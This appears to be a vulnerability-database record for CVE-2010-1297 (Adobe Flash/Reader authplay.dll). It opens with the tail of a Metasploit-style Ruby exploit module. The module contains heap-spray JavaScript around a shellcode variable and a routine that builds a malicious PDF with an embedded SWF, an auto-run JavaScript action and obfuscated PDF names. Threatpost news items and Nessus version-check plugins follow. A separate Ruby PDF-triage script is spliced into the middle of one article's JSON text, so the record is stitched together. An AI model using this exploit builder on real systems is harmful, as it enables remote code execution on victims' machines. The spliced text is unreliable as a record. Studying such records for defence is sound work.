#{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = ""\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t"%d 0 obj\\n" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t"%d 0 R" % 
id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = ""\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << "#%x" % c.unpack("C*")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = ""\r\n\t\twhitespace = ""\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << "%02x" % b\r\n\t\t\twhitespace = " " * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << ">"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + ".swf"\r\n\r\n\t\txref = []\r\n\t\teol = "\\n"\r\n\t\tendobj = "endobj" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = "%PDF-1.5" << eol\r\n\t\t#pdf << "%" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu("<</Type/Catalog")\r\n\t\tpdf << nObfu("/Pages ") << ioRef(3)\r\n\t\tpdf << nObfu("/OpenAction ") << ioRef(5)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3)\r\n\t\tpdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ")\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << "endstream" << 
eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia")\r\n\t\tpdf << nObfu("/Rect [20 20 187 69] ")\r\n\t\tpdf << nObfu("/RichMediaSettings ") << ioRef(8)\r\n\t\tpdf << nObfu("/RichMediaContent ") << ioRef(9)\r\n\t\tpdf << nObfu("/NM (") << swf_name << nObfu(")")\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash")\r\n\t\tpdf << nObfu("/Activation ") << ioRef(10)\r\n\t\tpdf << nObfu("/Deactivation ") << ioRef(11)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu("<</Type/RichMediaContent")\r\n\t\tpdf << nObfu("/Assets ") << ioRef(12)\r\n\t\tpdf << nObfu("/Configurations [") << ioRef(14) << "]"\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash")\r\n\t\tpdf << nObfu("/Instances [") << ioRef(15) << nObfu("]>>")\r\n\t\tpdf << eol << 
endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash")\r\n\t\tpdf << nObfu("/Asset ") << ioRef(13)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << "xref" << eol\r\n\t\tpdf << "0 %d" % (xref.length + 1) << eol\r\n\t\tpdf << "0000000000 65535 f" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << "%010d 00000 n" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << "trailer" << eol\r\n\t\tpdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol\r\n\r\n\t\tpdf << "startxref" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << "%%EOF" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71128"}], "threatpost": [{"lastseen": "2018-10-06T23:07:40", "bulletinFamily": "info", "cvelist": ["CVE-2010-1297"], "description": "[](<https://threatpost.com/adobe-warns-flash-pdf-zero-day-attack-060410/>)Adobe issued an alert late Friday night to warn about zero-day attacks against an unpatched vulnerability in its Reader and Flash Player software products.\n\nThe vulnerability, described as critical, affects Adobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.\n\nIt also affects the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems, Adobe said.\n\nFrom [Adobe\u2019s 
advisory](<http://www.adobe.com/support/security/advisories/apsa10-01.html>):\n\n_This vulnerability (CVE-2010-1297) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat._\n\nThe Flash Player 10.1 Release Candidate \u201cdoes not appear to be vulnerable,\u201d the company said.\n\n**Mitigation Guidance**\n\nIn the absence of a patch, Adobe recommends deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x. This will mitigate the threat but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content.\n\nThe authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\authplay.dll for Adobe Reader or C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\authplay.dll for Acrobat.\n\nAdobe Reader and Acrobat 8.x are confirmed not vulnerable.\n\nAdobe security chief Brad Arkin said the company received the first malicious sample around 10:30 AM on Friday. 
There is no information on when a patch will be available.\n", "modified": "2018-08-15T12:37:40", "published": "2010-06-05T03:10:19", "id": "THREATPOST:F7E082438478997F07E358DD1CB69C57", "href": "https://threatpost.com/adobe-warns-flash-pdf-zero-day-attack-060410/74069/", "type": "threatpost", "title": "Adobe Warns of Flash, PDF Zero Day Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:40", "bulletinFamily": "info", "cvelist": ["CVE-2010-1297"], "description": "[](<https://threatpost.com/adobe-release-flash-patch-june-10-060810/>)Adobe said on Monday that it will have a patch available for the [newly discovered critical vulnerability in Flash](<https://threatpost.com/adobe-warns-flash-pdf-zero-day-attack-060410/>) ready by June 10 for most platforms. The patches for Adobe Reader and Acrobat, which also are affected by the flaw, won\u2019t be released until June 29.\n\nThe new flaw was discovered late last week and Adobe security officials said that they were aware of attacks against the vulnerability in the wild. Adobe usually distributes its patches on a quarterly basis, but Brad Arkin, the company\u2019s director of product security and privacy, said in a [blog post Monday night](<http://blogs.adobe.com/asset/2010/06/background_on_apsa10-01_patch.html>) that the company decided to push the releases up.\n\nThe June 29, 2010 security update for Adobe Reader and Acrobat \nrepresents an accelerated release of the next quarterly security update \noriginally scheduled for July 13, 2010. In addition to addressing \nCVE-2010-1297, the accelerated next quarterly Adobe Reader and Acrobat \nupdate will also resolve a number of responsibly disclosed \nvulnerabilities. 
The full details will be in the Security Bulletin and \nRelease Notes we will publish when the security update is posted.\n\nAmong other options, we also considered the alternative of releasing a \none-off 0-day fix followed a couple of weeks later by the July 13 \nquarterly update. However, two patches within three weeks would have \nincurred too much churn and patch management overhead on our users, in \nparticular for customers with large managed environments.\n\nThe patch for Flash released on June 10 will address the vulnerability on Windows, Mac and Linux. The release date for a Flash patch for Solaris has not been determined yet. Also on Monday Adobe released [updated mitigation guidance](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) for users looking to thwart attacks before the patch is available. \n\nFor Windows users:\n\nDeleting, renaming, or removing access to the authplay.dll file that \nships with Adobe Reader 9.x and \nAcrobat 9.x mitigates the threat for those products, but users \nwill experience a non-exploitable \ncrash or error message when opening a PDF file that contains \nSWF content. 
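The mitigation quoted above works because Reader hands every SWF embedded in a PDF to authplay.dll, and the Metasploit module earlier on this page shows exactly how such a file is assembled: a /RichMedia annotation, a /RichMediaInstance with /Subtype/Flash, an /EmbeddedFile stream holding the SWF, then an xref table of byte offsets and a trailer. The Ruby below is an added example written for this page, not the module's code and not anything from Adobe: it builds a file with that object layout (object numbers and the placeholder stream bytes are this example's own choices, and the placeholder is not a real SWF), then runs the two checks a triage analyst wants on a suspect PDF: does every xref entry really point at the object it claims, and which objects would route content through authplay.dll.

```ruby
# Added example for this page: build a Flash-carrying PDF the way the module
# does (RichMedia annotation -> /Subtype/Flash instance -> /EmbeddedFile
# stream), then validate its xref table and list the SWF-bearing objects.
# Object numbering and the placeholder payload are this example's own choices.
EOL = "\r\n"

# Constructed placeholder: "CWS" magic, version 10, bogus length, zlib header,
# zero padding. Not a real SWF; it renders as nothing.
SAMPLE_SWF = ['CWS', 10, 64, 0x78, 0x9c].pack('a3CVCC') + ("\x00" * 8)

def build_flash_pdf(swf)
  objs = {
    1 => '<</Type/Catalog/Pages 2 0 R>>',
    2 => '<</Type/Pages/Kids[3 0 R]/Count 1>>',
    3 => '<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Annots[4 0 R]>>',
    4 => '<</Type/Annot/Subtype/RichMedia/Rect[0 0 612 792]/RichMediaContent 5 0 R>>',
    5 => '<</Type/RichMediaContent/Assets<</Names[(a.swf) 7 0 R]>>/Configurations[6 0 R]>>',
    6 => '<</Type/RichMediaConfiguration/Subtype/Flash/Instances[8 0 R]>>',
    7 => '<</Type/Filespec/F(a.swf)/EF<</F 9 0 R>>>>',
    8 => '<</Type/RichMediaInstance/Subtype/Flash/Asset 7 0 R>>'
  }
  pdf = "%PDF-1.7#{EOL}".b   # binary buffer: xref entries are BYTE offsets
  xref = {}
  objs.each do |num, body|
    xref[num] = pdf.bytesize
    pdf << "#{num} 0 obj#{EOL}#{body}#{EOL}endobj#{EOL}"
  end
  # The SWF stream is written as-is, like the module's "already compressed" data.
  xref[9] = pdf.bytesize
  pdf << "9 0 obj#{EOL}<</Type/EmbeddedFile/Length #{swf.bytesize}>>#{EOL}stream#{EOL}"
  pdf << swf.b << EOL << "endstream#{EOL}endobj#{EOL}"
  xref_pos = pdf.bytesize
  pdf << "xref#{EOL}0 #{xref.size + 1}#{EOL}0000000000 65535 f#{EOL}"
  xref.keys.sort.each { |n| pdf << format("%010d 00000 n#{EOL}", xref[n]) }
  pdf << "trailer#{EOL}<</Size #{xref.size + 1}/Root 1 0 R>>#{EOL}"
  pdf << "startxref#{EOL}#{xref_pos}#{EOL}%%EOF#{EOL}"
  pdf
end

# Follow startxref to the table and confirm each in-use entry lands on
# "<num> 0 obj". Returns a list of problems; empty means the table is honest.
def check_xref(pdf)
  problems = []
  m = pdf.match(/startxref\s+(\d+)\s+%%EOF/)
  return ['no startxref'] unless m
  section = pdf.byteslice(m[1].to_i..-1)
  hdr = section.match(/\Axref\s+(\d+) (\d+)\s+/)
  return ['startxref does not point at an xref table'] unless hdr
  first, count = hdr[1].to_i, hdr[2].to_i
  entries = section.byteslice(hdr.end(0)..-1).scan(/(\d{10}) (\d{5}) ([nf])/).first(count)
  problems << "xref declares #{count} entries, found #{entries.size}" if entries.size != count
  entries.each_with_index do |(off, _gen, kind), i|
    next if kind == 'f'
    num = first + i
    head = pdf.byteslice(off.to_i, 32)
    problems << "object #{num}: offset #{off} does not start '#{num} 0 obj'" unless head.start_with?("#{num} 0 obj")
  end
  problems
end

# Objects that make Reader load SWF content through authplay.dll:
# a /RichMedia annotation, /Subtype/Flash configuration/instance dictionaries,
# and the /EmbeddedFile stream they point at. Returns {object number => tags}.
def flash_objects(pdf)
  pdf.scan(/(\d+) 0 obj\s+(<<.*?>>)\s*(?:stream|endobj)/m).each_with_object({}) do |(num, dict), found|
    tags = []
    tags << :richmedia_annotation if dict =~ %r{/Subtype\s*/RichMedia\b}
    tags << :flash_instance if dict =~ %r{/Subtype\s*/Flash\b}
    tags << :embedded_file if dict =~ %r{/Type\s*/EmbeddedFile\b}
    found[num.to_i] = tags unless tags.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  sample = build_flash_pdf(SAMPLE_SWF)
  p check_xref(sample)     # => []
  p flash_objects(sample)  # => {4=>[:richmedia_annotation], 6=>[:flash_instance], 8=>[:flash_instance], 9=>[:embedded_file]}
end
```

Two caveats for anyone reusing this on real samples. The checker only follows a single classic xref table; files with incremental updates, cross-reference streams or object streams (PDF 1.5 /ObjStm) need a real parser. And the regex tags are triage hints, not a detector: PDF names may be written with #xx hex escapes (the module's nObfu helper exists precisely to mangle them), so a file can carry /Subtype/Flash without the literal bytes appearing anywhere.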
\n\nThe authplay.dll that ships with Adobe Reader 9.x and Acrobat \n9.x for Windows is typically located at C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\authplay.dll for Adobe Reader or C:\\Program Files\\Adobe\\Acrobat 9.0\\Acrobat\\authplay.dll for Acrobat.\n\nFor Mac users, the guidance is specific to each vulnerable application and can be found in [Adobe\u2019s advisory](<http://www.adobe.com/support/security/advisories/apsa10-01.html>). \n", "modified": "2018-08-15T12:37:29", "published": "2010-06-08T10:56:42", "id": "THREATPOST:40512FCC86A3D41C18AC58E1B95FF55E", "href": "https://threatpost.com/adobe-release-flash-patch-june-10-060810/74071/", "type": "threatpost", "title": "Adobe to Release Flash Patch June 10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T01:14:25", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. 
This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. 
(CVE-2010-2212)", "edition": 25, "published": "2010-06-30T00:00:00", "title": "Adobe Reader < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB10-15.NASL", "href": "https://www.tenable.com/plugins/nessus/47165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47165);\n script_version(\"1.54\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40034\");\n\n script_name(english:\"Adobe Reader < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_cve_id(\n \"CVE-2010-1240\",\n \"CVE-2010-1285\",\n \"CVE-2010-1295\",\n \"CVE-2010-1297\",\n \"CVE-2010-2168\",\n \"CVE-2010-2201\",\n \"CVE-2010-2202\",\n \"CVE-2010-2204\",\n \"CVE-2010-2205\",\n \"CVE-2010-2206\",\n \"CVE-2010-2207\",\n \"CVE-2010-2208\",\n \"CVE-2010-2209\",\n \"CVE-2010-2210\",\n \"CVE-2010-2211\",\n \"CVE-2010-2212\"\n );\n script_bugtraq_id(\n 39109,\n 40586,\n 41230,\n 41231,\n 41232,\n 41234,\n 41236,\n 41237,\n 41238,\n 41239,\n 41240,\n 41241,\n 41242,\n 41243,\n 41244,\n 41245\n );\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. 
Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. 
(CVE-2010-2212)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 9.3.3 / 8.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\n#\n\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = 
'';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB list is missing.');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 3) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 3)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 9.3.3 / 8.2.3\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\n\nif (info2) \n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:02", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. 
(CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. 
(CVE-2010-2212)", "edition": 25, "published": "2010-06-30T00:00:00", "title": "Adobe Acrobat < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-15.NASL", "href": "https://www.tenable.com/plugins/nessus/47164", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47164);\n script_version(\"1.51\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40034\");\n\n script_name(english:\"Adobe Acrobat < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_cve_id(\n \"CVE-2010-1240\",\n \"CVE-2010-1285\",\n \"CVE-2010-1295\",\n \"CVE-2010-1297\",\n \"CVE-2010-2168\",\n \"CVE-2010-2201\",\n \"CVE-2010-2202\",\n \"CVE-2010-2204\",\n \"CVE-2010-2205\",\n \"CVE-2010-2206\",\n \"CVE-2010-2207\",\n \"CVE-2010-2208\",\n \"CVE-2010-2209\",\n \"CVE-2010-2210\",\n \"CVE-2010-2211\",\n \"CVE-2010-2212\"\n );\n script_bugtraq_id(\n 39109,\n 40586,\n 41230,\n 41231,\n 41232,\n 41234,\n 41236,\n 41237,\n 41238,\n 41239,\n 41240,\n 41241,\n 41242,\n 41243,\n 41244,\n 41245\n );\n \n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. 
